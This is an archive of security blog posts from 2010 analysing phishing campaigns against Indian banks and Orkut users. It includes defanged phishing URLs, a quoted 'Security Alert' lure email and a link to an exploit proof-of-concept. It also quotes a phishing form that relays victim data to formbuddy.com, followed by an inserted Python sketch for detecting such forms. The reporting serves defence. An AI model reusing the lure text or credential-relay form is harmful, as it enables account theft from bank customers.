Thursday, May 20, 2010

Phish With attachment

Here is what we identified


A phishing mail with an attached HTML file disguised as a PDF file, which has the following link inside

inside

Multiple levels of redirection are used.

red

But OpenDNS saved the day with its blacklisting database.

open_dns

OpenDNS provides a good level of protection from fake and malware sites.

Here is information on how to use this service

https://store.opendns.com/setup/router/

Monday, March 29, 2010

Bit.ly Targeted with bank Phishing

We have seen the security features of bit.ly and its increased use as a short URL service; now it is being exploited to send bank phishing emails.

 

Here is the link

hxxp://bit.ly/czFcBc

with the following content

Security Alert:

Dear Valued Customer
Your Account has generated an error code on our Account Maintainance Server.
As an additional security measure, you are required to follow the security link below to
avoid such occurence in the future.
Please follow the link below to resolve this problem:

This link redirects to a hacked site

hxxp://75.125.175.170/~makiasan/case/site.php

 

which then redirects with a 302 code to the following link hosting the phishing pages.

hxxp://pasteups.com/Help/Common%20Wealth/icici/onlineverification.do/indexx.html

Thursday, January 21, 2010

Orkut Phishing ….

Here is an Orkut phishing victim

orrkut

This leads to the following page hosted on a free web service

orkut_start

It gets the user information and redirects to the Orkut login page, but the information goes to the following guy

admin_okut - Copy

Online Phishing by Exploiting

Most of these phishing pages are hosted on hacked servers, and the data is sent to public domains such as free email and other services.

Here is the mail that takes us to the phishing page

mail

Here is a file hosted on the server

file loaded

This server was hacked because it is using outdated software

cause

with POC code

http://www.milw0rm.com/exploits/9556

Friday, January 15, 2010

Phishing using Form Buddy !

The last phishing page reported on Punjab National Bank uses the “Form Buddy” service to capture the information and redirect back to the original bank site. Here is the info found in the pages.

<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post"> 
<input type="hidden" name="username" value="tundehsbcxxxxxx">
<input type="hidden" name="reqd" value="0">
<input type="hidden" name="url" value="http://www.pnbindia.com">


 


It has been reported to Form Buddy.
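
A detection sketch for the pattern above, added here as an example and not part of the original post: it flags forms that POST to a host other than the page's own and carry a hidden field naming a third host, as the `url` field does in the quoted markup. The page URL, the benign form and all function names are assumptions made for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Form markup as quoted in the post; PAGE_URL is a constructed placeholder.
SAMPLE = '''<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post">
<input type="hidden" name="username" value="tundehsbcxxxxxx">
<input type="hidden" name="reqd" value="0">
<input type="hidden" name="url" value="http://www.pnbindia.com">'''
PAGE_URL = "http://phish.example/netbanking/login.html"
# Constructed benign form: same-host action, no redirect field.
BENIGN = '<form action="/login" method="post"><input type="hidden" name="csrf" value="a1b2"></form>'

class FormCollector(HTMLParser):
    """Collect every <form> with its action, method and hidden inputs."""
    def __init__(self):
        super().__init__()
        self.forms, self.current = [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.current = {"action": a.get("action", ""),
                            "method": a.get("method", "get").lower(), "hidden": {}}
            self.forms.append(self.current)
        elif tag == "input" and self.current is not None and a.get("type", "").lower() == "hidden":
            self.current["hidden"][a.get("name", "")] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "form":
            self.current = None

def host(value):
    """Hostname of an absolute URL, or '' for relative URLs and plain values."""
    return (urlparse(value).hostname or "").lower()

def audit_forms(html, page_url):
    """Report forms that submit to another host than the page they sit on."""
    parser = FormCollector()
    parser.feed(html)
    page_host, findings = host(page_url), []
    for form in parser.forms:
        action_host = host(form["action"])
        if not action_host or action_host == page_host:
            continue  # relative or same-host action: not a relay
        # Hidden fields naming a third host are likely post-submit redirects.
        redirects = {k: v for k, v in form["hidden"].items()
                     if host(v) not in ("", page_host, action_host)}
        findings.append({"action_host": action_host, "redirects": redirects,
                         "suspicious": form["method"] == "post" and bool(redirects)})
    return findings
```

Legitimate sites also use hosted form handlers, so a finding is a triage signal to combine with other evidence, such as the redirect target being a bank's domain.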

More Phishing ……….

We had a couple of phishing incidents reported today; here they are:

hxxp://searchindiaonline.com/bank-india/ing/INGBanner.html – ING phishing

directs to

image

hxxp://netpnbsecuritysystem.t35.com/netpnb/ – PNB bank

site loaded by above link

image

APK spam on Whatsapp Targeting Bank users

Initial vector: A WhatsApp spam user posing as Union Bank, with the bank's logo in the user profile, shared an APK file named “Union Bank Aadhaar Update....